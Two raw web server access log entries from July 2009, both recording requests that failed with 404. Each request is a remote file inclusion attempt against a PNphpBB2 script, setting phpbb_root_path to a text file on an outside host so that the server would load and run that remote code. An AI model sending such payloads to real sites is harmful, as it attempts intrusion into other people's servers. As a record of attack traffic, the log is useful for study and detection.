80.190.246.41 - - [06/Jul/2009:06:29:58 -0400] "GET /logs/access_log.Q109061600/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:06:29:58 -0400] "GET /logs/access_log.Q109052200%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
